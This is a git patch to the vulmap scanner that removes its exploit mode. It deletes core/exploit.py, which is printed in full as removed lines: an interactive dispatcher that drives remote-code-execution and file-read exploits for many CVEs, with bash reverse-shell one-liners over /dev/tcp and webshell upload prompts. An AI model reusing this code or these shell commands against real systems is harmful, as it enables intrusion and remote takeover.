From 6bd19e783d30d7f97788588126e5dcf58946ec1d Mon Sep 17 00:00:00 2001 From: zhzyker Date: Wed, 1 Sep 2021 10:58:00 +0800 Subject: [PATCH] rm exploit --- core/core.py | 14 +- core/exploit.py | 390 --------------------------------------------- module/argparse.py | 3 - module/banner.py | 2 +- version | 2 +- vulmap.py | 4 +- 6 files changed, 6 insertions(+), 409 deletions(-) delete mode 100644 core/exploit.py diff --git a/core/core.py b/core/core.py index e5ffe53..2be99e8 100644 --- a/core/core.py +++ b/core/core.py @@ -17,7 +17,6 @@ from module.api.dns import dns_result, dns_request from module.api.shodan import shodan_api from core.scan import scan -from core.exploit import exploit from identify.identify import Identify from concurrent.futures import ThreadPoolExecutor, wait, ALL_COMPLETED @@ -25,6 +24,7 @@ class Core(object): @staticmethod def control_options(args): # 选项控制,用于处理所有选项 + mode = "poc" delay = globals.get_value("DELAY") # 获取全局变量延时时间DELAY now_warn = now.timed(de=delay) + color.red_warn() if args.socks: @@ -37,8 +37,6 @@ def control_options(args): # 选项控制,用于处理所有选项 exit(0) if args.thread_num != 10: # 判断是否为默认线程 print(now.timed(de=0) + color.yel_info() + color.yellow(" Custom thread number: " + str(args.thread_num))) - if args.vul is not None: # 判断是否-v进行漏洞利用 - args.mode = "exp" # 若进行漏洞利用修改模式为exp if args.debug is False: # 判断是否开启--debug功能 print(now.timed(de=delay) + color.yel_info() + color.yellow(" Using debug mode to echo debug information")) globals.set_value("DEBUG", "debug") # 设置全局变量DEBUG @@ -55,7 +53,7 @@ def control_options(args): # 选项控制,用于处理所有选项 if os.path.isfile(args.O_JSON): # 判断json输出文件是否冲突 print(now.timed(de=delay) + color.red_warn() + color.red(" The json file: [" + args.O_JSON + "] already exists")) exit(0) - if args.mode is None or args.mode == "poc": # 判断是否进入poc模式 + if mode == "poc": # 判断是否进入poc模式 if args.url is not None and args.file is None: # 判断是否为仅-u扫描单个URL args.url = url_check(args.url) # 处理url格式 if survival_check(args.url) == "f": # 检查目标存活状态 @@ -113,11 +111,6 @@ def control_options(args): # 选项控制,用于处理所有选项 print(now.timed(de=delay) + color.yel_info() + color.cyan(" Scan result text saved to: " + args.O_TEXT)) if args.O_JSON: print(now.timed(de=delay) + color.yel_info() + color.cyan(" Scan result json saved to: " + args.O_JSON)) - elif args.mode == "exp": # 漏洞利用模式参数较少 - if args.vul is not None and args.url is not None: # 判断是否进入漏洞利用模式 - core.control_webapps("url", args.url, args.vul, "exp") - else: - print(now_warn + color.red(" Options error, -v must specify -u")) else: print(now_warn + color.red(" Options error ... ...")) @@ -256,9 +249,6 @@ def control_webapps(target_type, target, webapps, mode): joinall(gevent_pool) # 运行协程池 wait(thread_poc, return_when=ALL_COMPLETED) # 等待所有多线程任务运行完 print(now.timed(de=0) + color.yel_info() + color.yellow(" Scan completed and ended ")) - elif mode == "exp": # 漏洞利用 - vul_num = webapps - exploit(target, vul_num) # 调用core中的exploit @staticmethod def scan_webapps(webapps_identify, thread_poc, thread_pool, gevent_pool, target): diff --git a/core/exploit.py b/core/exploit.py deleted file mode 100644 index f88335c..0000000 --- a/core/exploit.py +++ /dev/null @@ -1,390 +0,0 @@ -#!/usr/bin/env python3 -# -*- coding: utf-8 -*- -import sys -from module import globals -from module.time import now -from module.color import color -from module.allcheck import os_check, url_check, survival_check -from payload.ApacheShiro import ApacheShiro -from payload.ApacheSolr import ApacheSolr -from payload.ApacheTomcat import ApacheTomcat -from payload.Elasticsearch import Elasticsearch -from payload.Jenkins import Jenkins -from payload.Spring import Spring -from payload.OracleWeblogic import OracleWeblogic -from payload.ApacheFlink import ApacheFlink -from payload.Nexus import Nexus -from payload.RadHatJBoss import RedHatJBoss -from payload.ApacheUnomi import ApacheUnomi -from payload.ThinkPHP import ThinkPHP -from payload.Drupal import Drupal -from payload.ApacheStruts2 import ApacheStruts2 -from payload.Fastjson import Fastjson -from payload.ApacheDruid import ApacheDruid -from payload.Laravel import Laravel -from payload.Vmware import Vmware -from payload.SaltStack import SaltStack -from payload.Exchange import Exchange -from payload.F5_BIG_IP import BIG_IP -from payload.ApacheOFBiz import ApacheOFBiz -from payload.QiAnXin import QiAnXin -from payload.Eyou import Eyou -from payload.Ecology import Ecology - - -explists = ("CVE-2017-12629", "CVE-2019-17558", "S2-005", "S2-008", "S2-009", "S2-013", "S2-015", "S2-016", "S2-029", - "S2-032", "S2-045", "S2-046", "S2-048", "S2-052", "S2-057", "S2-059", "S2-061", "S2-devMode", - "CVE-2014-3120", "CVE-2015-1427", "CVE-2016-3088", "CVE-2016-4437", "CVE-2017-12615", "CVE-2020-1938", - "CVE-2018-7600", "CVE-2018-7602", "CVE-2019-6340", "CVE-2018-1000861", "CVE-2019-7238", "CVE-2020-10199", - "CVE-2017-3506", "CVE-2017-10271", "CVE-2018-2894", "CVE-2019-2725", "CVE-2019-2729", "CVE-2020-2555", - "CVE-2020-2883", "CVE-2020-14882", "CVE-2010-0738", "CVE-2010-1428", "CVE-2015-7501", "CVE-2018-20062", - "CVE-2019-9082", "CVE-2020-13942", "CVE-2020-17519", "CVE-2019-3799", "CVE-2020-5410", "cve-2017-12629", - "cve-2019-17558", "s2-005", "s2-008", "s2-009", "s2-013", "s2-015", "s2-016", "s2-029", "s2-032", - "s2-045", "s2-046", "s2-048", "s2-052", "s2-057", "s2-059", "s2-061", "s2-devmode", "cve-2014-3120", - "cve-2015-1427", "cve-2016-3088", "cve-2016-4437", "cve-2017-12615", "cve-2020-1938", "cve-2018-7600", - "cve-2018-7602", "cve-2019-6340", "cve-2018-1000861", "cve-2019-7238", "cve-2020-10199", "cve-2017-3506", - "cve-2017-10271", "cve-2018-2894", "cve-2019-2725", "cve-2019-2729", "cve-2020-2555", "cve-2020-2883", - "cve-2020-14882", "cve-2010-0738", "cve-2010-1428", "cve-2015-7501", "cve-2018-20062", "cve-2019-9082", - "cve-2020-13942", "cve-2020-17519", "cve-2019-3799", "cve-2020-5410", "VER-1224-2", "VER-1224-1", "VER-1247", - "VER-1262", "ver-1224-2", "ver-1224-1", "ver-1247", "ver-1262", "ver-1224-3", "VER-1224-3", - "CVE-2021-25646", "cve-2021-25646", "CVE-2018-15133", "cve-2018-15133", "CVE-2021-21972", "cve-2021-21972", - "CVE-2021-25282", "cve-2021-25282", "CVE-2021-27065", "cve-2021-27065", "CVE-2021-22986", "cve-2021-22986", - "CVE-2020-5902", "cve-2020-5902", "CVE-2021-26295", "cve-2021-26295", "time-2021-0410", "CVE-2021-2109", - "cve-2021-2109", "cnvd-2021-26422", "CNVD-2021-26422", "CVE-2021-30128", "cve-2021-30128", "time-2021-0515", - "TIME-202-0515") - - -def exploit(target, vul_num): - target = url_check(target) - if survival_check(target) == "f": - print(now.timed(de=0) + color.red_warn() + color.red(" Survival check failed: " + target)) - exit(0) - delay = globals.get_value("DELAY") # 获取全局变量DELAY - exp_apache_shiro = ApacheShiro(target) - exp_apache_solr = ApacheSolr(target) - exp_apache_tomcat = ApacheTomcat(target) - exp_elasticsearch = Elasticsearch(target) - exp_apache_flink = ApacheFlink(target) - exp_jenkins = Jenkins(target) - exp_spring = Spring(target) - exp_nexus = Nexus(target) - exp_oracle_weblogic = OracleWeblogic(target) - exp_redhat_jboss = RedHatJBoss(target) - exp_apache_unomi = ApacheUnomi(target) - exp_thinkphp = ThinkPHP(target) - exp_drupal = Drupal(target) - exp_fastjson = Fastjson(target) - exp_apache_struts2 = ApacheStruts2(target) - exp_apache_druid = ApacheDruid(target) - exp_laravel = Laravel(target) - exp_vmware = Vmware(target) - exp_saltstack = SaltStack(target) - exp_exchange = Exchange(target) - exp_big_ip = BIG_IP(target) - exp_apache_ofbiz = ApacheOFBiz(target) - exp_qianxin = QiAnXin(target) - exp_eyou = Eyou(target) - exp_ecology = Ecology(target) - print(now.timed(de=delay) + color.yel_info() + color.cyan(" Target url: " + target)) - print(now.timed(de=delay) + color.yel_info() + color.cyan(" Use exploit modules: " + vul_num)) - nc = now.timed(de=0) + color.yel_info() + color.yellow(" input \"nc\" bounce linux shell") - up = now.timed(de=0) + color.yel_info() + color.yellow(" input \"upload\" upload webshell") - rmi_ldap = now.timed(de=0) + color.yel_info() + color.yellow(" RMI/LDAP Server:(e.g. ldap://192.168.0.1/Exploit)") - bash = now.timed(de=0) + color.yel_info() + color.yellow(" nc shell: \"bash -i >&/dev/tcp/127.0.0.1/9999 0>&1\"") - bash_2 = now.timed(de=0) + color.yel_info() + color.yellow(" nc shell: \"/bin/bash -c $@|bash 0 echo bash -i >&/dev/tcp/127.0.0.1/8888 0>&1\"") - jndi = now.timed(de=0) + color.yel_info() + color.yellow(" Reference https://github.com/feihong-cs/JNDIExploit") - cmd = "whoami" # 为了消除pycharm错误提示,没啥用 - file = "/etc/passwd" # 为了消除pycharm错误提示,没啥用 - path = "/tmp/test" # 为了消除pycharm错误提示,没啥用 - shiro_key = "1" # 为了消除pycharm错误提示,没啥用 - shiro_gadget = "1" # 为了消除pycharm错误提示,没啥用 - nexus_u = "admin" # 为了消除pycharm错误提示,没啥用 - nexus_p = "admin" # 为了消除pycharm错误提示,没啥用 - laravel_key = "null" # 为了消除pycharm错误提示,没啥用 - laravel_gadget = 1 # 为了消除pycharm错误提示,没啥用 - - if vul_num not in explists: - print(now.timed(de=0) + color.red_warn() + color.red( - " The vulnerability does not support exploitation. Please refer to \"--list\"")) - sys.exit(0) - - elif vul_num == "CVE-2016-4437" or vul_num == "cve-2016-4437": - if os_check() == "linux" or os_check() == "other": - shiro_key = input(now.timed(de=delay) + color.green("[+] key: ")) - shiro_gadget = input(now.timed(de=delay) + color.green("[+] gadget: ")) - elif os_check() == "windows": - shiro_key = input(now.no_color_timed(de=delay) + "[+] key: ") - shiro_gadget = input(now.no_color_timed(de=delay) + "[+] gadget: ") - while True: - if os_check() == "linux" or os_check() == "other": - cmd = input(now.timed(de=delay) + color.green("[+] Shell >>> ")) - elif os_check() == "windows": - cmd = input(now.no_color_timed(de=delay) + "[+] Shell >>> ") - if cmd == "exit" or cmd == "quit" or cmd == "bye": - sys.exit(0) - exp_apache_shiro.cve_2016_4437_exp(cmd, shiro_key, shiro_gadget) - elif vul_num == "CVE-2020-1938" or vul_num == "cve-2020-1938": - print(now.timed(de=delay) + color.yel_info() + color.yellow(" Examples: WEB-INF/web.xml")) - while True: - if os_check() == "linux" or os_check() == "other": - file = input(now.timed(de=delay) + color.green("[+] File >>> ")) - elif os_check() == "windows": - file = input(now.no_color_timed(de=delay) + "[+] File >>> ") - if file == "exit" or file == "quit" or file == "bye": - exit(0) - exp_apache_tomcat.cve_2020_1938_exp(file) - elif vul_num == "CVE-2019-3799" or vul_num == "cve-2019-3799": - print(now.timed(de=delay) + color.yel_info() + color.yellow(" Examples: /etc/passwd")) - while True: - if os_check() == "linux" or os_check() == "other": - file = input(now.timed(de=delay) + color.green("[+] File >>> ")) - elif os_check() == "windows": - file = input(now.no_color_timed(de=delay) + "[+] File >>> ") - if file == "exit" or file == "quit" or file == "bye": - exit(0) - exp_spring.cve_2019_3799_exp(file) - elif vul_num == "CVE-2020-5410" or vul_num == "cve-2020-5410": - print(now.timed(de=delay) + color.yel_info() + color.yellow(" Examples: /etc/passwd")) - while True: - if os_check() == "linux" or os_check() == "other": - file = input(now.timed(de=delay) + color.green("[+] File >>> ")) - elif os_check() == "windows": - file = input(now.no_color_timed(de=delay) + "[+] File >>> ") - if file == "exit" or file == "quit" or file == "bye": - exit(0) - exp_spring.cve_2020_5410_exp(file) - elif vul_num == "CVE-2020-17519" or vul_num == "cve-2020-17519": - print(now.timed(de=delay) + color.yel_info() + color.yellow(" Examples: /etc/passwd")) - while True: - if os_check() == "linux" or os_check() == "other": - file = input(now.timed(de=delay) + color.green("[+] File >>> ")) - elif os_check() == "windows": - file = input(now.no_color_timed(de=delay) + "[+] File >>> ") - if file == "exit" or file == "quit" or file == "bye": - exit(0) - exp_apache_flink.cve_2020_17519_exp(file) - elif vul_num == "CVE-2020-10199" or vul_num == "cve-2020-10199": - if os_check() == "linux" or os_check() == "other": - nexus_u = input(now.timed(de=delay) + color.green("[+] Input username: ")) - nexus_p = input(now.timed(de=delay) + color.green("[+] Input password: ")) - elif os_check() == "windows": - nexus_u = input(now.no_color_timed(de=delay) + "[+] Input username: ") - nexus_p = input(now.no_color_timed(de=delay) + "[+] Input password: ") - while True: - if os_check() == "linux" or os_check() == "other": - cmd = input(now.timed(de=delay) + color.green("[+] Shell >>> ")) - elif os_check() == "windows": - cmd = input(now.no_color_timed(de=delay) + "[+] Shell >>> ") - if cmd == "exit" or cmd == "quit" or cmd == "bye": - sys.exit(0) - exp_nexus.cve_2020_10199_exp(cmd, nexus_u, nexus_p) - elif vul_num == "CVE-2018-15133" or vul_num == "cve-2018-15133": - if os_check() == "linux" or os_check() == "other": - laravel_key = input(now.timed(de=delay) + color.green("[+] Input APP_KEY: ")) - elif os_check() == "windows": - laravel_key = input(now.no_color_timed(de=delay) + "[+] Input APP_KEY: ") - if os_check() == "linux" or os_check() == "other": - laravel_gadget = input(now.timed(de=delay) + color.green("[+] Input phpggc gadget Laravel/RCE[1-4] (default:1): ")) - elif os_check() == "windows": - laravel_gadget = input(now.no_color_timed(de=delay) + "[+] Input phpggc gadget Laravel/RCE[1-4] (default:1): ") - while True: - if os_check() == "linux" or os_check() == "other": - cmd = input(now.timed(de=delay) + color.green("[+] Shell >>> ")) - elif os_check() == "windows": - cmd = input(now.no_color_timed(de=delay) + "[+] Shell >>> ") - if cmd == "exit" or cmd == "quit" or cmd == "bye": - sys.exit(0) - exp_laravel.cve_2018_15133_exp(cmd, laravel_key, laravel_gadget) - elif vul_num == "CVE-2021-21972" or vul_num == "cve-2021-21972": - if os_check() == "linux" or os_check() == "other": - os_type = input(now.timed(de=delay) + color.green("[+] The target os type (linux/windows): ")) - elif os_check() == "windows": - os_type = input(now.no_color_timed(de=delay) + "[+] The target os type (linux/windows): ") - while True: - if os_check() == "linux" or os_check() == "other": - cmd = input(now.timed(de=delay) + color.green("[+] Shell >>> ")) - elif os_check() == "windows": - cmd = input(now.no_color_timed(de=delay) + "[+] Shell >>> ") - if cmd == "exit" or cmd == "quit" or cmd == "bye": - sys.exit(0) - exp_vmware.cve_2021_21972_exp(cmd, os_type) - elif vul_num == "CVE-2021-25282" or vul_num == "cve-2021-25282": - if os_check() == "linux" or os_check() == "other": - file = input(now.timed(de=delay) + color.green("[+] upload file: ")) - path = input(now.timed(de=delay) + color.green("[+] upload path (e.g. /tmp/test.txt): ")) - elif os_check() == "windows": - file = input(now.no_color_timed(de=delay) + "[+] upload file: ") - path = input(now.no_color_timed(de=delay) + "[+] upload path (e.g. /tmp/test.txt): ") - while True: - if os_check() == "linux" or os_check() == "other": - cmd = input(now.timed(de=delay) + color.green("[+] Shell >>> ")) - elif os_check() == "windows": - cmd = input(now.no_color_timed(de=delay) + "[+] Shell >>> ") - if cmd == "exit" or cmd == "quit" or cmd == "bye": - sys.exit(0) - exp_saltstack.cve_2021_25282_exp(cmd, file, path) - elif vul_num == "CVE-2021-27065" or vul_num == "cve-2021-27065": - if os_check() == "linux" or os_check() == "other": - email = input(now.timed(de=delay) + color.green("[+] email: ")) - file = input(now.timed(de=delay) + color.green("[+] webshell name (e.g. shell.aspx): ")) - elif os_check() == "windows": - email = input(now.timed(de=delay) + "[+] email: ") - file = input(now.no_color_timed(de=delay) + "[+] uwebshell name (e.g. shell.aspx: ") - while True: - if os_check() == "linux" or os_check() == "other": - cmd = input(now.timed(de=delay) + color.green("[+] Shell >>> ")) - elif os_check() == "windows": - cmd = input(now.no_color_timed(de=delay) + "[+] Shell >>> ") - if cmd == "exit" or cmd == "quit" or cmd == "bye": - sys.exit(0) - exp_exchange.cve_2021_27065_exp(cmd, file, email) - elif vul_num == "CVE-2021-2109" or vul_num == "cve-2021-2109": - print(jndi) - if os_check() == "linux" or os_check() == "other": - ldap = input(now.timed(de=delay) + color.green("[+] ldap (e.g. ldap://127.0.0.1:1389/Basic/WeblogicEcho ): ")) - elif os_check() == "windows": - ldap = input(now.no_color_timed(de=delay) + color.green("[+] ldap (e.g. ldap://127.0.0.1:1389/Basic/WeblogicEcho ): ")) - while True: - if os_check() == "linux" or os_check() == "other": - cmd = input(now.timed(de=delay) + "[+] Shell >>> ") - elif os_check() == "windows": - cmd = input(now.no_color_timed(de=delay) + "[+] Shell >>> ") - if cmd == "exit" or cmd == "quit" or cmd == "bye": - sys.exit(0) - exp_oracle_weblogic.cve_2021_2109_exp(ldap, cmd) - - # 远程命令执行漏洞单独简单运行 - else: - while True: - if os_check() == "linux" or os_check() == "other": - cmd = input(now.timed(de=delay) + color.green("[+] Shell >>> ")) - elif os_check() == "windows": - cmd = input(now.no_color_timed(de=delay) + "[+] Shell >>> ") - if cmd == "exit" or cmd == "quit" or cmd == "bye": - exit(0) - elif vul_num == "CVE-2017-12615" or vul_num == "cve-2017-12615": - exp_apache_tomcat.cve_2017_12615_exp(cmd) - elif vul_num == "CVE-2014-3120" or vul_num == "cve-2014-3120": - exp_elasticsearch.cve_2014_3120_exp(cmd) - elif vul_num == "CVE-2015-1427" or vul_num == "cve-2015-1427": - exp_elasticsearch.cve_2015_1427_exp(cmd) - elif vul_num == "CVE-2018-1000861" or vul_num == "cve-2018-1000861": - exp_jenkins.cve_2018_1000861_exp(cmd) - - elif vul_num == "CVE-2017-3506" or vul_num == "cve-2017-3506": - exp_oracle_weblogic.cve_2017_3506_exp(cmd) - elif vul_num == "CVE-2017-10271" or vul_num == "cve-2017-10271": - print(nc) - print(up) - exp_oracle_weblogic.cve_2017_10271_exp(cmd) - elif vul_num == "CVE-2018-2894" or vul_num == "cve-2018-2894": - exp_oracle_weblogic.cve_2018_2894_exp(cmd) - elif vul_num == "CVE-2019-2725" or vul_num == "cve-2019-2725": - print(nc) - print(up) - exp_oracle_weblogic.cve_2019_2725_exp(cmd) - elif vul_num == "CVE-2019-2729" or vul_num == "CVE-2019-2729": - print(nc) - exp_oracle_weblogic.cve_2019_2729_exp(cmd) - elif vul_num == "CVE-2020-2555" or vul_num == "cve-2020-2555": - exp_oracle_weblogic.cve_2020_2555_exp(cmd) - elif vul_num == "CVE-2020-2883" or vul_num == "cve-2020-2883": - exp_oracle_weblogic.cve_2020_2883_exp(cmd) - elif vul_num == "CVE-2020-14882" or vul_num == "cve-2020-14882": - exp_oracle_weblogic.cve_2020_14882_exp(cmd) - elif vul_num == "CVE-2017-12629" or vul_num == "cve-2017-12629": - exp_apache_solr.cve_2017_12629_exp(cmd) - elif vul_num == "CVE-2019-17558" or vul_num == "cve-2019-17558": - exp_apache_solr.cve_2019_17558_exp(cmd) - elif vul_num == "CVE-2019-7238" or vul_num == "cve-2019-7238": - exp_nexus.cve_2019_7238_exp(cmd) - elif vul_num == "CVE-2010-0738" or vul_num == "cve-2010-0738": - exp_redhat_jboss.cve_2010_0738_exp(cmd) - elif vul_num == "CVE-2010-1428" or vul_num == "cve-2010-1428": - exp_redhat_jboss.cve_2010_1428_exp(cmd) - elif vul_num == "CVE-2015-7501" or vul_num == "cve-2015-7501": - exp_redhat_jboss.cve_2015_7501_exp(cmd) - elif vul_num == "CVE-2020-13942" or vul_num == "cve-2020-13942": - exp_apache_unomi.cve_2020_13942_exp(cmd) - - elif vul_num == "CVE-2019-9082" or vul_num == "cve-2019-9082": - print(up) - exp_thinkphp.cve_2019_9082_exp(cmd) - elif vul_num == "CVE-2018-20062" or vul_num == "cve-2018-20062": - exp_thinkphp.cve_2018_20062_exp(cmd) - elif vul_num == "CVE-2018-7600" or vul_num == "cve-2018-7600": - exp_drupal.cve_2018_7600_exp(cmd) - elif vul_num == "CVE-2018-7602" or vul_num == "cve-2018-7602": - exp_drupal.cve_2018_7602_exp(cmd) - elif vul_num == "CVE-2019-6340" or vul_num == "cve-2019-6340": - exp_drupal.cve_2019_6340_exp(cmd) - - elif vul_num == "S2-005" or vul_num == "s2-005": - exp_apache_struts2.s2_005_exp(cmd) - elif vul_num == "S2-008" or vul_num == "s2-008": - exp_apache_struts2.s2_008_exp(cmd) - elif vul_num == "S2-009" or vul_num == "s2-009": - exp_apache_struts2.s2_009_exp(cmd) - elif vul_num == "S2-013" or vul_num == "s2-013": - exp_apache_struts2.s2_013_exp(cmd) - elif vul_num == "S2-015" or vul_num == "s2-015": - exp_apache_struts2.s2_015_exp(cmd) - elif vul_num == "S2-016" or vul_num == "s2-016": - exp_apache_struts2.s2_016_exp(cmd) - elif vul_num == "S2-029" or vul_num == "s2-029": - exp_apache_struts2.s2_029_exp(cmd) - elif vul_num == "S2-032" or vul_num == "s2-032": - exp_apache_struts2.s2_032_exp(cmd) - elif vul_num == "S2-045" or vul_num == "s2-045": - exp_apache_struts2.s2_045_exp(cmd) - elif vul_num == "S2-046" or vul_num == "s2-046": - exp_apache_struts2.s2_046_exp(cmd) - elif vul_num == "S2-048" or vul_num == "s2-048": - exp_apache_struts2.s2_048_exp(cmd) - elif vul_num == "S2-052" or vul_num == "s2-052": - exp_apache_struts2.s2_052_exp(cmd) - elif vul_num == "S2-057" or vul_num == "s2-057": - exp_apache_struts2.s2_057_exp(cmd) - elif vul_num == "S2-059" or vul_num == "s2-059": - exp_apache_struts2.s2_059_exp(cmd) - elif vul_num == "S2-061" or vul_num == "s2-061": - exp_apache_struts2.s2_061_exp(cmd) - elif vul_num == "S2-devMode" or vul_num == "s2-devmode": - exp_apache_struts2.s2_devMode_exp(cmd) - - elif vul_num == "VER-1224-1" or vul_num == "ver-1224-1": - print(rmi_ldap) - exp_fastjson.fastjson_1224_1_exp(cmd) - elif vul_num == "VER-1224-2" or vul_num == "ver-1224-2": - exp_fastjson.fastjson_1224_2_exp(cmd) - elif vul_num == "VER-1224-3" or vul_num == "ver-1224-3": - exp_fastjson.fastjson_1224_3_exp(cmd) - elif vul_num == "VER-1247" or vul_num == "ver-1247": - print(rmi_ldap) - exp_fastjson.fastjson_1247_exp(cmd) - elif vul_num == "VER-1262" or vul_num == "ver-1262": - print(rmi_ldap) - exp_fastjson.fastjson_1262_exp(cmd) - elif vul_num == "CVE-2021-25646" or vul_num == "cve-2021-25646": - print(bash_2) - exp_apache_druid.cve_2021_25646_exp(cmd) - elif vul_num == "CVE-2021-22986" or vul_num == "cve-2021-22986": - exp_big_ip.cve_2021_22986_exp(cmd) - elif vul_num == "CVE-2020-5902" or vul_num == "cve-2020-5902": - print(now.timed(de=delay) + color.yel_info() + color.yellow(" Examples: /etc/passwd")) - exp_big_ip.cve_2020_5902_exp(cmd) - elif vul_num == "CVE-2021-26295" or vul_num == "cve-2021-26295": - print(now.timed(de=delay) + color.yel_info() + color.yellow(" java encode: http://www.jackson-t.ca/runtime-exec-payloads.html")) - exp_apache_ofbiz.cve_2021_26295_exp(cmd) - elif vul_num == "CVE-2021-30128" or vul_num == "cve-2021-30128": - print(now.timed(de=delay) + color.yel_info() + color.yellow(" java encode: http://www.jackson-t.ca/runtime-exec-payloads.html")) - exp_apache_ofbiz.cve_2021_30128_exp(cmd) - elif vul_num == "time-2021-0410" or vul_num == "TIME-2021-0410": - exp_qianxin.time_2021_0410_exp(cmd) - elif vul_num == "CNVD-2021-26422" or vul_num == "cnvd-2021-26422": - exp_eyou.cnvd_2021_26422_exp(cmd) - elif vul_num == "time-2021-0515" or vul_num == "TIME-2021-0515": - exp_ecology.time_2021_0515_exp(cmd) - - else: - pass diff --git a/module/argparse.py b/module/argparse.py index fe303d7..d37e89c 100644 --- a/module/argparse.py +++ b/module/argparse.py @@ -11,9 +11,7 @@ def arg(): target.add_argument("--fofa", dest="fofa", metavar='keyword', type=str, help=" call fofa api to scan (e.g. --fofa \"app=Apache-Shiro\")") target.add_argument("--shodan", dest="shodan", metavar='keyword', type=str, help=" call shodan api to scan (e.g. --shodan \"Shiro\")") mo = parser.add_argument_group("mode", "options vulnerability scanning or exploit mode") - mo.add_argument("-m", "--mode", dest="mode", type=str, help="supports poc and exp, if not specified the default poc") mo.add_argument("-a", dest="app", type=str, nargs='+', help="specify webapps (e.g. -a \"tomcat\") allow multiple") - mo.add_argument("-v", "--vul", type=str, default=None, help="exploit, specify vuln number (e.g. -v CVE-2019-2729)") ge = parser.add_argument_group("general", "general options") ge.add_argument("-h", "--help", action="help", help="show this help message and exit") ge.add_argument("-t", "--thread", dest="thread_num", type=int, default=10, metavar='NUM', @@ -42,7 +40,6 @@ def arg(): example.add_argument(action='store_false', dest="python3 vulmap.py -u http://example.com\n " "python3 vulmap.py -u http://example.com -a struts2\n " - "python3 vulmap.py -u http://example.com:7001 -v CVE-2019-2729\n " "python3 vulmap.py -f list.txt -a weblogic -t 20\n " "python3 vulmap.py -f list.txt --output-json results.json\n " "python3 vulmap.py --fofa \"app=Apache-Shiro\"") diff --git a/module/banner.py b/module/banner.py index b94097e..a6510b6 100644 --- a/module/banner.py +++ b/module/banner.py @@ -140,5 +140,5 @@ def vul_list(): | Vmware vCenter | CVE-2021-21972 | Y | Y | 7.0 < 7.0U1c, 6.7 < 6.7U3l, 6.5 < 6.5U3n, any file upload | | VMware vRealize | CVE-2021-21975 | Y | N | <= 8.3.0, vmware vrealize operations manager api ssrf | +-------------------+------------------+-----+-----+-------------------------------------------------------------+ - """) + """ + color.yellow("\n Vulmap release does not provide the exploit function after September 1, 2021 \n")) return vuln_list diff --git a/version b/version index aec258d..b63ba69 100644 --- a/version +++ b/version @@ -1 +1 @@ -0.8 +0.9 diff --git a/vulmap.py b/vulmap.py index af1db4f..5751736 100644 --- a/vulmap.py +++ b/vulmap.py @@ -28,13 +28,13 @@ def config(): } globals.init() # 初始化全局变量模块 globals.set_value("UA", args.ua) # 设置全局变量UA - globals.set_value("VUL", args.vul) # 设置全局变量VULN用于判断是否漏洞利用模式 + globals.set_value("VUL", None) # 设置全局变量VULN用于判断是否漏洞利用模式 globals.set_value("CHECK", args.check) # 目标存活检测 globals.set_value("DEBUG", args.debug) # 设置全局变量DEBUG globals.set_value("DELAY", args.delay) # 设置全局变量延时时间DELAY globals.set_value("DNSLOG", args.dnslog) # 用于判断使用哪个dnslog平台 globals.set_value("DISMAP", "flase") # 是否接收dismap识别结果(false/true) - globals.set_value("VULMAP", str(0.8)) # 设置全局变量程序版本号 + globals.set_value("VULMAP", str(0.9)) # 设置全局变量程序版本号 globals.set_value("O_TEXT", args.O_TEXT) # 设置全局变量OUTPUT判断是否输出TEXT globals.set_value("O_JSON", args.O_JSON) # 设置全局变量OUTPUT判断是否输出JSON globals.set_value("HEADERS", header) # 设置全局变量HEADERS